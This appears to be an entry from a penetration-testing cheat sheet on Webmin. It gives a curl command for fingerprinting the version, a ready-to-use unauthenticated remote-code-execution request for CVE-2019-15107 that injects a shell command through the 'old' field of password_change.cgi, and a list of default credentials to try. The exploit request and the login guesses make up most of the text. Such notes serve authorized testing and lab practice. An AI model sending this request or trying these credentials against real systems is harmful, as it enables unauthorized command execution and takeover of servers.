Webmin
What it is: Web-based system administration tool for Unix/Linux. Manages users, services, configs through a browser interface. Usually runs on port 10000 with HTTPS.
Default ports: 10000
Vuln research:
Identify Webmin version
Usually on port 10000 — Check login page source
curl -sk https://$IP:10000/ | grep -i version
Webmin RCE (CVE-2019-15107)
Unauthenticated RCE on Webmin 1.890-1.920 — Password reset backdoor
curl -sk "https://$IP:10000/password_change.cgi" -d 'user=root&pam=&expired=2&old=id%7Cid&new1=test&new2=test'
Default credentials
Common Webmin logins — Check for password reuse with system accounts
# root:<system password>
# admin:admin
# Webmin uses PAM by default = system credentials work